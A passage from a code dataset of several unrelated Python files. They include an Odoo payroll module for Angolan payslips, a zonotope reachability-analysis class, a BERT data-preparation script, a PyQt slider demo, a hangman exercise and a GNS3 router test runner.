continue;\n if line.category_id.code in ('BAS', 'HEXTRA', 'FALTA', 'ABOIRT', 'ABOINSSIRT', 'DEDINSSIRT', 'INSS'):\n _sum = _sum + line.total\n res[slip.id] = _sum\n slip.amount_base_irt = _sum\n return res\n\n # @api.multi\n def compute_payslip_period(self):\n res = {}\n for slip in self:\n # date_obj = datetime.strptime(slip.date_to, '%Y-%m-%d')\n date_obj = slip.date_to\n months = {\n 1: _('January'),\n 2: _('February'),\n 3: _('March'),\n 4: _('April'),\n 5: _('May'),\n 6: _('June'),\n 7: _('July'),\n 8: _('August'),\n 9: _('September'),\n 10: _('October'),\n 11: _('November'),\n 12: _('December'),\n }\n # return months[int(date_obj.month)]\n slip.payslip_period = months[int(date_obj.month)]\n\n # @api.multi\n def compute_total_remunerations(self):\n res = {}\n for slip in self:\n rem_total = 0.0\n for slipline in slip.line_ids:\n if not slipline.appears_on_payslip:\n continue\n rem_total += slipline.remuneration\n res[slip.id] = rem_total\n slip.total_remunerations = rem_total\n return res\n\n # @api.one\n def compute_total_deductions(self):\n res = {}\n for slip in 
self:\n ded_total = 0.0\n for slipline in slip.line_ids:\n if not slipline.appears_on_payslip:\n continue\n ded_total += slipline.deduction\n res[slip.id] = ded_total\n slip.total_deductions = ded_total\n return res\n\n # @api.multi\n def compute_total_paid(self):\n for slip in self:\n slip.total_paid = slip.total_remunerations - slip.total_deductions\n\n # @api.multi\n def compute_total_paid_usd(self):\n aoa_currency = self.env.ref('base.AOA')\n usd_currency = self.env.ref('base.USD')\n for slip in self:\n slip.total_paid_usd = aoa_currency._compute(aoa_currency, usd_currency, slip.total_paid)\n\n # @api.one\n def compute_period_working_days(self):\n for payslip in self:\n # TODO Add code to consider public holidays\n schedule = payslip.contract_id.resource_calendar_id\n total_days = 0\n date_from = fields.Date.from_string(payslip.date_from)\n date_to = fields.Date.from_string(payslip.date_to)\n delta_days = (date_to - date_from).days\n for single_date in (date_from + timedelta(n) for n in range(delta_days + 1)):\n total_days += 1\n payslip.period_working_days = total_days\n\n @api.onchange('date_to')\n def on_change_date_to(self):\n for payslip in self:\n aoa_currency = self.env.ref('base.AOA').with_context(date=payslip.date_to)\n usd_currency = self.env.ref('base.USD').with_context(date=payslip.date_to)\n rate_date_at = self.env[\"res.company\"].sudo().search([], limit=1)\n if rate_date_at:\n if rate_date_at.rate_date_at == 'current_date':\n payslip.currency_rate = self.env['res.currency']._get_conversion_rate(usd_currency, aoa_currency,\n payslip.company_id or self.env.user.company_id,\n date.today())\n elif rate_date_at.rate_date_at == 'payslip_close_date':\n payslip.currency_rate = self.env['res.currency']._get_conversion_rate(usd_currency, aoa_currency,\n payslip.company_id or self.env.user.company_id,\n payslip.date_to)\n\n @api.depends('date_to', 'company_id')\n # @api.one\n def compute_currency_rate(self):\n for payslip in self:\n aoa_currency = self.env.ref('base.AOA').with_context(date=payslip.date_to)\n usd_currency = self.env.ref('base.USD').with_context(date=payslip.date_to)\n # self.currency_rate = self.env['res.currency']._get_conversion_rate(usd_currency, aoa_currency, self.company_id or self.env.user.company_id,\n # self.date_to)\n rate_date_at = self.env[\"res.company\"].sudo().search([('id', '=', payslip.company_id.id)], limit=1)\n if rate_date_at:\n if rate_date_at.rate_date_at == 'current_date':\n payslip.currency_rate = self.env['res.currency']._get_conversion_rate(usd_currency, aoa_currency,\n payslip.company_id or self.env.user.company_id,\n date.today())\n elif rate_date_at.rate_date_at == 'payslip_close_date':\n payslip.currency_rate = self.env['res.currency']._get_conversion_rate(usd_currency, aoa_currency,\n payslip.company_id or self.env.user.company_id,\n payslip.date_to)\n\n # @api.one\n def compute_show_total_paid_usd(self):\n for slip in self:\n slip.show_total_paid_usd = slip.env.user.company_id.show_paid_usd\n\n ####Send email\n def action_send_email(self, cr=None, context=None):\n '''\n This function opens a window to compose an email, with the edi sale template message loaded by default\n '''\n uid = self.env.user\n ids = [self.id]\n\n template_id = self.env.ref('l10n_ao_hr_payroll.email_template_payslip_send_email', False)\n compose_form_id = False\n\n ctx = dict()\n ctx.update({\n 'default_model': 'hr.payslip',\n 'default_res_id': self.id,\n 'default_use_template': bool(template_id),\n 'default_template_id': template_id and template_id.id or 
False,\n 'default_composition_mode': 'comment',\n })\n return {\n 'type': 'ir.actions.act_window',\n 'view_type': 'form',\n 'view_mode': 'form',\n 'res_model': 'mail.compose.message',\n 'views': [(compose_form_id, 'form')],\n 'view_id': compose_form_id,\n 'target': 'new',\n 'context': ctx,\n }\n\n remuneration = fields.Float(compute=compute_remuneration, digits=(10, 2), string='Remuneration',\n help='This is the Wage amount')\n overtimes = fields.Float(compute=compute_overtimes, digits=(10, 2), string='Overtimes',\n help='This is the total amount for Overtimes')\n extra_remunerations = fields.Float(compute=compute_extra_remunerations, digits=(10, 2), string='Extra Remuneration')\n misses = fields.Float(compute=compute_misses, digits=(10, 2), string='Misses',\n help='This is the total discount for misses')\n remuneration_inss_base = fields.Float(compute=compute_remuneration_inss_base, digits=(10, 2),\n string='Base INSS Remuneration',\n help='This is the Wage plus Overtime minus Misses')\n remuneration_inss_extra = fields.Float(compute=compute_remuneration_inss_extra, digits=(10, 2),\n string='Extra INSS Remuneration',\n help='Those are other INSS collectible remunerations')\n remuneration_inss_total = fields.Float(compute=compute_remuneration_inss_total, digits=(10, 2),\n string='Gross Remuneration')\n amount_inss = fields.Float(compute=compute_amount_inss, digits=(10, 2), string='INSS Amount')\n amount_irt = fields.Float(compute=compute_amount_irt, digits=(10, 2), string='IRT Amount')\n extra_deductions = fields.Float(compute=compute_extra_deductions, digits=(10, 2), string='Extra Deduction')\n amount_base_irt = fields.Float(compute=compute_amount_base_irt, digits=(10, 2), string='IRT Base Amount')\n period_working_days = fields.Integer(compute=compute_period_working_days, string='Payslip Days')\n payslip_period = fields.Char(compute=compute_payslip_period, string='Payslip Period')\n total_remunerations = fields.Float(compute=compute_total_remunerations, digits=(10, 2),\n string='Total of Remunerations')\n total_deductions = fields.Float(compute=compute_total_deductions, digits=(10, 2), string='Total of Deductions')\n total_paid = fields.Float(compute=compute_total_paid, digits=(10, 2), string='Total Paid')\n currency_rate = fields.Float('Currency Rate', dp.get_precision('Payroll Rate'), compute=compute_currency_rate,\n store=True)\n total_paid_usd = fields.Float(compute=compute_total_paid_usd, digits=(10, 2), string='Total Paid (USD)')\n show_total_paid_usd = fields.Boolean(compute=compute_show_total_paid_usd, string='Show Total Paid (USD)')\n wage = fields.Monetary(related=\"line_ids.contract_id.wage\")\n\n @api.onchange('employee_id')\n def on_change_employee_id(self):\n for payslip in self:\n if payslip.employee_id:\n contract_id = self.env[\"hr.contract\"].sudo().search(\n [('employee_id', '=', payslip.employee_id.id), ('date_start', '<=', payslip.date_to), '|',\n ('date_end', '>=', payslip.date_from),\n ('date_end', '=', False)], limit=1)\n if contract_id:\n payslip.contract_id = contract_id\n else:\n payslip.contract_id = False\n payslip.struct_id = False\n\n @api.onchange('contract_id')\n def on_change_contract_id(self):\n for payslip in self:\n if payslip.contract_id:\n struct_id = self.env[\"hr.payroll.structure\"].sudo().search(\n [('type_id', '=', payslip.contract_id.structure_type_id.id)], limit=1)\n if struct_id:\n payslip.struct_id = struct_id\n else:\n payslip.name = \"\"\n\n\nclass PayslipRun(models.Model):\n _inherit = 'hr.payslip.run'\n\n # @api.multi\n def 
action_send_email(self):\n for slip_run in self:\n for slip in slip_run.slip_ids:\n template = self.env.ref('l10n_ao_hr_payroll.email_template_payslipsendingtemplate0')\n self.env['mail.template'].browse(template.id).send_mail(slip.id)\n template.send_mail(slip.id)\n","repo_name":"DosSantosAlberto/V16","sub_path":"l10n_ao_hr_payroll/models/payslip.py","file_name":"payslip.py","file_ext":"py","file_size_in_byte":19676,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"7404759580","text":"# -------------------------------------------------------------\n# code developed by Michael Hartmann during his Ph.D.\n# Reachability Analysis\n#\n# (C) 2020 Michael Hartmann, Graz, Austria\n# Released under GNU GENERAL PUBLIC LICENSE\n# email michael.hartmann@v2c2.at\n# -------------------------------------------------------------\n\nfrom reachab.util.visualizer import *\nimport numpy as np\nimport scipy.spatial\nfrom scipy import signal\n\n\"\"\"\n Class for reachability analysis\n\"\"\"\nclass reachability(object):\n def __init__(self, **kwargs):\n self.params={'T': kwargs.get('T',2.2),\n 'N': kwargs.get('N',4),\n 'gamma': 0.01 #threshold for control input constraint (inf-norm)\n }\n self.obj_visual = visualizer()\n self.params['r']=self.params['T']/(self.params['N']+1)\n self.sys={'A': None, 'B': None, 'C': None, 'D': None}\n self.init_fcn()\n\n \"\"\"\n Initial function to get system dynamics\n \"\"\"\n def init_fcn(self):\n A = np.matrix([[0, 0, 1, 0],\n [0, 0, 0, 1],\n [0, 0, 0, 0],\n [0, 0, 0, 0]])\n B = np.matrix([[0, 0],\n [0, 0],\n [1, 0],\n [0, 1]])\n C = np.eye(4)\n D = np.zeros((4, 2))\n self.system_dynamics(A, B, C, D)\n\n\n\n \"\"\"\n System dynamics\n \"\"\"\n def system_dynamics(self, A, B, C, D):\n self.discrete_sys=signal.StateSpace(A, B, C, D, dt=self.params['r'])\n self.sys['A']=np.array(self.discrete_sys.A)\n self.sys['B'] = np.array(self.discrete_sys.B)\n self.sys['C'] = np.array(self.discrete_sys.C)\n self.sys['D'] = np.array(self.discrete_sys.D)\n\n #see Otto Föllinger, \"Regelungstechnik\" and Thesis of Matthias Althoff:\n self.Phi=np.eye(4)+self.params['r']*self.sys['A']+1/(2)*(self.sys['A']*self.params['r'])**2+1/(6)*(self.sys['A']*self.params['r'])**3+1/(24)*(self.sys['A']*self.params['r'])**4\n\n \"\"\"\n Mulitplication with the center\n \"\"\"\n def multiplication_on_center(self, mat):\n return mat*np.matrix(self.zonotype['c'])\n\n \"\"\"\n Multiplication with a generator list\n \"\"\"\n def multiplication_on_generator(self, mat, list):\n return mat*np.matrix(list)\n\n \"\"\"\n Convert to Matrix\n \"\"\"\n def convert_to_matrix(self, list):\n erg=np.hstack((list[0], list[1]))\n for i in range(2, len(list)):\n erg=np.hstack((erg, list[i]))\n return erg\n\n \"\"\"\n Mulitplication on a zonotype\n \"\"\"\n def multiplication_on_zonotype(self, mat, zonotype):\n Z = {'c': None, 'g': None}\n Z['c']=mat*zonotype['c']\n for i in range(0, np.size(zonotype['g'], 1)):\n act_g=zonotype['g'][:,i]\n if(i==0):\n g=mat*act_g\n else:\n g=np.hstack((g, mat*act_g))\n Z['g']=g\n return Z\n\n \"\"\"\n Get unique vectors\n \"\"\"\n def get_unique_vectors(self, vec):\n unique_vec = np.squeeze(np.unique(vec, axis=0))\n return unique_vec\n\n \"\"\"\n Get edge points of zonotype with convex hull operation\n \"\"\"\n def get_points_of_zonotype(self, zonotype):\n c=zonotype['c']\n g=zonotype['g']\n x_vec = [c]\n for wlt in range(0, np.size(g,1)):\n a=g[:, wlt]\n x_pos = [i+a for i in x_vec]\n x_neg = [i-a for i in x_vec]\n x_vec=x_pos+x_neg\n 
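# note: the vertex set doubles with each generator (2**G candidate points); if ConvexHull fails, the bare except below leaves 'points' unbound and the return raises NameError\n        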
unique_vec=self.get_unique_vectors(x_vec)\n try:\n points = self.compute_convex_hull(unique_vec[:, 0], unique_vec[:, 1])\n except:\n None\n return [points[:, 0], points[:, 1]], unique_vec\n\n \"\"\"\n Compute the convex hull\n \"\"\"\n def compute_convex_hull(self, x, y):\n v=np.transpose(np.vstack([x, y]))\n hull = scipy.spatial.ConvexHull(v)\n return hull.points[hull.vertices]\n\n \"\"\"\n Minkowski sum with two zonotypes\n \"\"\"\n def minkowski_zonotypes(self, ZA, ZB):\n Z={'c': None, 'g': None}\n Z['c']=ZA['c']+ZB['c']\n a=ZA['g']\n b=ZB['g']\n new_g=np.hstack((a, b))\n Z['g'] = new_g\n return Z\n\n\n \"\"\"\n Get Box Hull\n \"\"\"\n def get_box_hull(self, Omega):\n Z = {'c': None, 'g': None}\n r=self.get_points_of_zonotype(Omega)\n std=(((np.max(r[0])-np.min(r[0]))/2, (np.max(r[1])-np.min(r[1]))/2))\n q=np.diag(std)\n Z['c']=Omega['c']\n Z['g'] = np.matrix(np.vstack((q,np.zeros((2,2)))))\n return Z\n\n \"\"\"\n Approximation of Reachability analysis:\n based on algorithm 1 from: Girard, A.; \"Efficient Computation of Reachable Sets of Linear Time-Invariant Systems \n with Inputs\"\n \"\"\"\n def approximate_reachable_set_without_box(self, Omega_0, U):\n all_R = []\n all_X = []\n '''\n algorithm 1 from: Girard, A.; \"Efficient Computation of Reachable Sets of Linear Time-Invariant Systems with \n Inputs\"\n '''\n all_R.append(Omega_0)\n all_X.append(Omega_0)\n #self.params['N']\n # 1. step\n X_0=Omega_0\n X_i=X_0\n # 2. step\n V_0=U\n V_i=V_0\n # 3. step\n S_0={'c': np.matrix([[0],\n [0],\n [0],\n [0],\n ]),\n 'g': np.matrix([[0],\n [0],\n [0],\n [0]\n ])\n }\n S_i=S_0\n # 4. step\n for i in range(0, self.params['N']):\n # 5. step\n X_i = self.multiplication_on_zonotype(self.Phi, X_i)\n all_X.append(X_i)\n # 6. step\n S_i=self.minkowski_zonotypes(S_i, V_i)\n # 7. step\n V_i = self.multiplication_on_zonotype(self.Phi, V_i)\n # 8. step\n Omega_i=self.minkowski_zonotypes(X_i, S_i)\n all_R.append(Omega_i)\n return all_R, all_X\n\n \"\"\"\n Approximation of Reachability analysis:\n based on algorithm 2 from: Girard, A.; \"Efficient Computation of Reachable Sets of Linear Time-Invariant \n Systems with Inputs\"\n \"\"\"\n def approximate_reachable_set_with_box(self, Omega_0, U):\n all_R = []\n all_X = []\n '''\n algorithm 2 from: Girard, A.; \"Efficient Computation of Reachable Sets of Linear Time-Invariant Systems with \n Inputs\"\n '''\n all_R.append(Omega_0)\n all_X.append(Omega_0)\n\n #self.params['N']\n # 1. step\n X_0=Omega_0\n X_i=X_0\n # 2. step\n V_0=U\n V_i=V_0\n # 3. step\n S_0={'c': np.matrix([[0],\n [0],\n [0],\n [0],\n ]),\n 'g': np.matrix([[0],\n [0],\n [0],\n [0]\n ])\n }\n S_i=S_0\n # 4. step\n for i in range(0, self.params['N']):\n # 5. step\n X_i = self.multiplication_on_zonotype(self.Phi, X_i)\n all_X.append(X_i)\n # 6. step\n V_i_box = self.get_box_hull(V_i)\n S_i=self.minkowski_zonotypes(S_i, V_i_box)\n # 7. step\n V_i = self.multiplication_on_zonotype(self.Phi, V_i)\n # 8. step\n Omega_i=self.minkowski_zonotypes(X_i, S_i)\n Omega_i=self.get_box_hull(Omega_i)\n all_R.append(Omega_i)\n return all_R, all_X\n\n \"\"\"\n Approximation of Reachability analysis:\n based on algorithm from: Girard, A.; \"Reachability of Uncertain Linear Systems\n Using Zonotopes\"\n \"\"\"\n def approximate_reachable_set(self):\n '''\n algorithm from: Girard, A.; \"Reachability of Uncertain Linear Systems\n Using Zonotopes\"\n '''\n # 1. 
step\n #see self.params['N']\n inf_norm_A=np.linalg.norm(self.A, np.inf)\n r_norm_A=self.params['r']*inf_norm_A\n exp_r_norm_A=np.exp(r_norm_A)\n exp_r_A = np.exp(self.params['r']*self.A)\n # 2. step\n alpha_r=(exp_r_norm_A-1-r_norm_A)\n # 3. step\n beta_r=(exp_r_norm_A-1)*self.params['gamma']/inf_norm_A\n # 4. step\n P_0={'c': None, 'g': None}\n P_0['c']=np.array((self.zonotype['c']+self.multiplication_on_center(exp_r_norm_A))/2)\n a = [0.5*(i+self.multiplication_on_generator(exp_r_norm_A, i)) for i in self.zonotype['g']]\n b = [0.5 * (i + self.multiplication_on_generator(exp_r_norm_A, i)) for i in self.zonotype['g']]\n P_0['g']=self.get_unique_vectors(a+b)\n # 5. step\n rad=alpha_r+beta_r\n square_Z=self.square_zonotype(rad)\n Q_0=self.minkowski_zonotypes(P_0, square_Z)\n # 6. step\n all_R=[]\n Q_i = Q_0\n R_i=Q_0\n all_R.append(R_i)\n for i in range(1,self.params['N']-1):\n # 7. step\n P_i=self.multiplication_on_zonotype(exp_r_norm_A, Q_i)\n # 8. step\n square_Z = self.square_zonotype(beta_r)\n Q_i = self.minkowski_zonotypes(P_i, square_Z)\n # 9. step\n all_R.append(Q_i)\n return all_R\n\n \"\"\"\n Center trajectory\n \"\"\"\n def center_trajectory(self, R):\n erg=[]\n for i in range(0, len(R)):\n x = np.float(R[i]['c'][0])\n y = np.float(R[i]['c'][1])\n erg.append((x,y))\n return erg\n\n \"\"\"\n Test function\n \"\"\"\n def test_function(self):\n Omega_0 = {'c': np.matrix([[0],\n [0],\n [10],\n [3]\n ]),\n 'g': np.matrix([[1, -1, 1, .2, .2],\n [1, 1, .3, .2, .5],\n [0, 0, 0, .4, .3],\n [0, 0, 0, .2, .4]\n ])\n }\n U = {'c': np.matrix([[0],\n [0],\n [0],\n [0],\n ]),\n 'g': np.matrix([[1, 0, 1],\n [1, 1, 0],\n [0, 0, 0],\n [0, 0, 0]\n ])\n }\n program = ['without_box', 'with_box']\n program_select = 0\n if (program[0] == program[program_select]):\n R, X = self.approximate_reachable_set_without_box(Omega_0, U)\n elif (program[1] == program[program_select]):\n R, X = self.approximate_reachable_set_with_box(Omega_0, U)\n for act_zono in R:\n zonoset_P0 = self.get_points_of_zonotype(act_zono)\n self.obj_visual.filled_polygon(zonoset_P0, 'green', .2)\n for act_zono in X:\n zonoset_P0 = self.get_points_of_zonotype(act_zono)\n self.obj_visual.filled_polygon(zonoset_P0, 'orange')\n traj = self.center_trajectory(R)\n self.obj_visual.show_traj(traj)\n self.obj_visual.show()\n\nif __name__ == '__main__':\n obj_reach = reachability(**{'T':3, 'N':5})\n obj_reach.test_function()\n","repo_name":"ga74kud/reachab","sub_path":"reachab/src/reachability.py","file_name":"reachability.py","file_ext":"py","file_size_in_byte":11536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"39876403323","text":"\"\"\"\nTransforms csv-files to tsv-files and includes some helper classes and the function to convert argument texts to feature vectors.\n\n:author: Jan Stanicki\n\"\"\"\n\nfrom __future__ import absolute_import, division, print_function\nimport os\nimport sys\nimport logging\nimport csv\n\nimport pandas as pd\nfrom pytorch_pretrained_bert import BertTokenizer, BertModel, BertForMaskedLM, BertForSequenceClassification\n\nTRAIN_CORP_CSV = '../data/frames/data/Webis-argument-framing_train.csv'\nTRAIN_CORP_TSV = '../data/frames/data/Webis-argument-framing_train.tsv'\nTEST_CORP_CSV = '../data/frames/data/Webis-argument-framing_test.csv'\nTEST_CORP_TSV = '../data/frames/data/Webis-argument-framing_test.tsv'\n\ntrain_df = pd.read_csv(TRAIN_CORP_CSV, sep='|', skiprows=1, header=None)\n\ntrain_df_bert = pd.DataFrame({\n #'id':range(len(train_df)),\n 
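# columns (label, alpha, text) follow the TSV layout commonly used by BERT fine-tuning scripts; the written index column supplies the id\n    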
'label':train_df[2],\n 'alpha':['a']*train_df.shape[0],\n 'text': train_df[5].replace(r'\\n', ' ', regex=True)\n})\n\ntrain_df_bert.to_csv(TRAIN_CORP_TSV, sep='\\t', index=1, header=False)\n\ntest_df = pd.read_csv(TEST_CORP_CSV, sep='|', skiprows=1, header=None)\n\ntest_df_bert = pd.DataFrame({\n #'id':range(len(test_df)),\n 'label':test_df[2],\n 'alpha':['a']*test_df.shape[0],\n 'text': test_df[5].replace(r'\\n', ' ', regex=True)\n})\n\ntest_df_bert.to_csv(TEST_CORP_TSV, sep='\\t', index=1, header=False)\n\nlogger = logging.getLogger()\ncsv.field_size_limit(2147483647) # Increase CSV reader's field limit incase we have long text.\n\n\nclass InputExample(object):\n \"\"\"A single training/test example for simple sequence classification.\"\"\"\n\n def __init__(self, guid, text_a, text_b=None, label=None):\n \"\"\"Constructs an InputExample.\n Args:\n :param guid: Unique id for the example.\n :param text_a: string. The untokenized text of the first sequence. For single\n sequence tasks, only this sequence must be specified.\n :param text_b: (Optional) string. The untokenized text of the second sequence.\n Only must be specified for sequence pair tasks.\n :param label: (Optional) string. The label of the example. This should be\n specified for train and dev examples, but not for test examples.\n \"\"\"\n self.guid = guid\n self.text_a = text_a\n self.text_b = text_b\n self.label = label\n\n\nclass DataProcessor(object):\n \"\"\"Base class for data converters for sequence classification data sets.\"\"\"\n\n def get_train_examples(self, data_dir):\n \"\"\"Gets a collection of `InputExample`s for the train set.\"\"\"\n raise NotImplementedError()\n\n def get_dev_examples(self, data_dir):\n \"\"\"Gets a collection of `InputExample`s for the dev set.\"\"\"\n raise NotImplementedError()\n\n def get_labels(self):\n \"\"\"Gets the list of labels for this data set.\"\"\"\n raise NotImplementedError()\n\n @classmethod\n def _read_tsv(cls, input_file, quotechar=None):\n \"\"\"Reads a tab separated value file.\"\"\"\n with open(input_file, \"r\", encoding=\"utf-8\") as f:\n reader = csv.reader(f, delimiter=\"\\t\", quotechar=quotechar)\n lines = []\n for line in reader:\n if sys.version_info[0] == 2:\n line = list(unicode(cell, 'utf-8') for cell in line)\n lines.append(line)\n return lines\n\n\nclass MultiClassificationProcessor(DataProcessor):\n \"\"\"Processor for multi classification dataset.\"\"\"\n\n def get_train_examples(self, data_dir):\n \"\"\"See base class.\"\"\"\n return self._create_examples(\n self._read_tsv(os.path.join(data_dir, \"Webis-argument-framing_train.tsv\")), \"train\")\n\n def get_dev_examples(self, data_dir):\n \"\"\"See base class.\"\"\"\n return self._create_examples(\n self._read_tsv(os.path.join(data_dir, \"Webis-argument-framing_test.tsv\")), \"test\")\n\n def get_labels(self):\n \"\"\"See base class.\"\"\"\n return [str(x) for x in range(10)] #[\"0\", \"1\", \"2\", \"3\", \"4\", \"5\", \"6\"] Try:\n\n def _create_examples(self, lines, set_type):\n \"\"\"Creates examples for the training and dev sets.\"\"\"\n examples = []\n for (i, line) in enumerate(lines):\n guid = \"%s-%s\" % (set_type, i)\n text_a = line[3]\n label = line[1]\n examples.append(\n InputExample(guid=guid, text_a=text_a, text_b=None, label=label))\n return examples\n\nclass InputFeatures(object):\n \"\"\"A single set of features of data.\"\"\"\n\n def __init__(self, input_ids, input_mask, segment_ids, label_id):\n self.input_ids = input_ids\n self.input_mask = input_mask\n self.segment_ids = segment_ids\n 
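# label_id is the integer index looked up from label_map, or None for unlabeled (inference) examples\n        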
self.label_id = label_id\n\ndef convert_example_to_feature(example_row):\n \"\"\"\n Converts an argument example to a feature vector.\n\n :param example_row: tuple of example object, label_map, max_seq_length, tokenizer and output_mode needed for preprocessing\n :type example_row: tuple\n\n \"\"\"\n example, label_map, max_seq_length, tokenizer, output_mode = example_row\n output_mode = \"classification\"\n tokens_a = tokenizer.tokenize(example.text_a)\n tokens_b = None\n if example.text_b:\n tokens_b = tokenizer.tokenize(example.text_b)\n # Modifies `tokens_a` and `tokens_b` in place so that the total\n # length is less than the specified length.\n # Account for [CLS], [SEP], [SEP] with \"- 3\"\n _truncate_seq_pair(tokens_a, tokens_b, max_seq_length - 3)\n else:\n # Account for [CLS] and [SEP] with \"- 2\"\n if len(tokens_a) > max_seq_length - 2:\n tokens_a = tokens_a[:(max_seq_length - 2)]\n\n tokens = [\"[CLS]\"] + tokens_a + [\"[SEP]\"]\n segment_ids = [0] * len(tokens)\n\n if tokens_b:\n tokens += tokens_b + [\"[SEP]\"]\n segment_ids += [1] * (len(tokens_b) + 1)\n\n input_ids = tokenizer.convert_tokens_to_ids(tokens)\n # The mask has 1 for real tokens and 0 for padding tokens. Only real\n # tokens are attended to.\n input_mask = [1] * len(input_ids)\n\n # Zero-pad up to the sequence length.\n padding = [0] * (max_seq_length - len(input_ids))\n input_ids += padding\n input_mask += padding\n segment_ids += padding\n\n assert len(input_ids) == max_seq_length\n assert len(input_mask) == max_seq_length\n assert len(segment_ids) == max_seq_length\n\n\n if hasattr(example_row, 'label_id') and output_mode == \"classification\":\n label_id = label_map[example.label]\n return InputFeatures(input_ids=input_ids,\n input_mask=input_mask,\n segment_ids=segment_ids,\n label_id=label_id)\n else:\n return InputFeatures(input_ids=input_ids,\n input_mask=input_mask,\n segment_ids=segment_ids,\n label_id=None)\n","repo_name":"Micha-Z/gencou","sub_path":"gencou/frame_bert_prepare_data.py","file_name":"frame_bert_prepare_data.py","file_ext":"py","file_size_in_byte":6883,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"15260702899","text":"import sys\nimport qdarkstyle\nimport PyQt5.QtCore\nimport PyQt5.QtWidgets\n\n\nclass Example(PyQt5.QtWidgets.QWidget):\n\t\n\tdef __init__(self):\n\t\tsuper().__init__()\n\t\t\n\t\tself.init_ui()\n\n\tdef init_ui(self):\n\t\t\n\t\tlcd = PyQt5.QtWidgets.QLCDNumber(self) # https://doc.qt.io/qt-5/qlcdnumber.html#details\n\t\tsld = PyQt5.QtWidgets.QSlider(PyQt5.QtCore.Qt.Horizontal, self)\n\n\t\tvbox = PyQt5.QtWidgets.QVBoxLayout()\n\t\tvbox.addWidget(lcd)\n\t\tvbox.addWidget(sld)\n\n\t\tself.setLayout(vbox)\n\t\tsld.valueChanged.connect(lcd.display)\n\t\t\n\t\tself.setGeometry(300, 300, 250, 150)\n\t\tself.setWindowTitle('Signal & slot')\n\t\tself.show()\n\t\t\n\nif __name__ == '__main__':\n\t\n\tapp = PyQt5.QtWidgets.QApplication(sys.argv)\n\tapp.setStyleSheet(qdarkstyle.load_stylesheet_pyqt5())\n\n\tex = Example()\n\tsys.exit(app.exec_())\n\n'''\nwe display a QtGui.QLCDNumber and a QtGui.QSlider. \nWe change the lcd number by dragging the slider knob.\n'''\n\n# sld.valueChanged.connect(lcd.display)\n'''\nHere we connect a valueChanged signal of the slider to \nthe display slot of the lcd number.\n\nThe sender is an object that sends a signal. \nThe receiver is the object that receives the signal. 
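Here, sld is the sender and lcd is the receiver. 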
\nThe slot is the method that reacts to the signal.\n'''","repo_name":"Pullem/1st-step-in-python","sub_path":"4_events and signals/1_slider.py","file_name":"1_slider.py","file_ext":"py","file_size_in_byte":1182,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"25719242669","text":"import random\n\nword_list = [\"aardvark\", \"baboon\", \"camel\"]\nchosen_word = random.choice(word_list)\ndisplay = []\nfor char in chosen_word:\n    display.append(\"_\")\n\nguess = input(\"Try to guess a letter. Type your answer here: \").lower()\n\nfor position in range(len(chosen_word)):\n    letter = chosen_word[position]\n    if guess == letter:\n        display[position] = letter\n    ","repo_name":"MrSmoKkkk98/udemy_course_100_days_of_code","sub_path":"day_7/day_7_hangman_2.py","file_name":"day_7_hangman_2.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"45033504403","text":"import pprint\nimport yaml\nimport pytest\nimport time\nimport sys\nimport os\n\nsys.path.insert(1, os.path.join(sys.path[0],'..')) # !!! PATH for import with position 1!!!\n# sys.path.insert(1, os.path.join(sys.path[0],'../command_cfg/')) # !!! PATH for import with position 1!!!\n# sys.path.append(os.path.join(os.getcwd(),'..')) # !!! PATH for import!!!\n\n# pprint.pprint(sys.path)\n\nfrom ping3 import ping, verbose_ping\nfrom cfg_bm10 import Cfg_bm10\nfrom base_gns3 import Base_gns\nfrom base_bm10 import Base_bm10\n\n\n\nCfg_bm10.console.print(\n    \"The test runs according to the test procedure (PMI) 'Multihoming 3G/4G failover (mwan3) support check'.\n It is recommended to read the test description first.\n During the test the lab name will be requested and answer options will be offered\",\n    style='info'\n    )\ntime.sleep(6)\ncurrent_lab = Base_gns() # the test expects this lab - SSV_auto_BM10_wan_lte\nCfg_bm10.console.print(\"Starting lab setup in gns3\",style='info')\ntime.sleep(5)\nprint(current_lab.start_nodes_from_project())\nCfg_bm10.console.print(\"Starting DUT config reset before the test setup\n\" ,style='info')\ntime.sleep(5)\nwith open(\"../command_cfg/value_bm10.yaml\")as f:\n    temp = yaml.safe_load(f)\n    for t in temp:\n        device = dict(t)\n        r1 = Cfg_bm10(**device)\n    with open(\"../command_cfg/commands_reset_cfg.yaml\") as f14: # config reset commands\n        commands_reset_cfg = yaml.safe_load(f14)\n    print(r1.cfg_multihoming_failover(device,commands_reset_cfg)) # Config reset \n    Cfg_bm10.console.print(\"Starting DUT setup for the test 'Multihoming 3G/4G failover (mwan3) support check'\n\" ,style='info')\n    time.sleep(5)\n    with open(\"../command_cfg/value_bm10.yaml\")as f:\n        temp = yaml.safe_load(f)\n        for t in temp:\n            device = dict(t)\n            r1 = Cfg_bm10(**device)\n        with open(\"../command_cfg/commands_cfg_wan_lte.yaml\") as f15: # setup commands \n            commands_cfg_wan_lte = yaml.safe_load(f15)\n        print(r1.cfg_multihoming_failover(device,commands_cfg_wan_lte)) # DUT setup for the test \n\nCfg_bm10.console.print(\"Starting pytest setup for the test 'Multihoming 3G/4G failover (mwan3) support check'\n\" 
,style='info')\ntime.sleep(10)\npytest.main([\"-v\",\"-s\",\"--html=BULAT_TEST_BM10_Multihoming_failover.html\",\"../tests_all/test_check_wan_lte.py\"])\n","repo_name":"SergeyVolkoff/bm10_tasks","sub_path":"src/my_module/start_gns_tests/start_gns_test_multihom_failover.py","file_name":"start_gns_test_multihom_failover.py","file_ext":"py","file_size_in_byte":2758,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"36014243753","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport cv2\nimport copy\nimport numpy as np\nfrom progress.bar import Bar\nimport time\nimport torch\nimport torch.nn.functional as F\nimport math\n\nfrom model.model import create_model, load_model\nfrom model.decode import generic_decode\nfrom model.utils import flip_tensor, flip_lr_off, flip_lr\nfrom utils.image import get_affine_transform, affine_transform\nfrom utils.image import draw_umich_gaussian, gaussian_radius\nfrom utils.post_process import 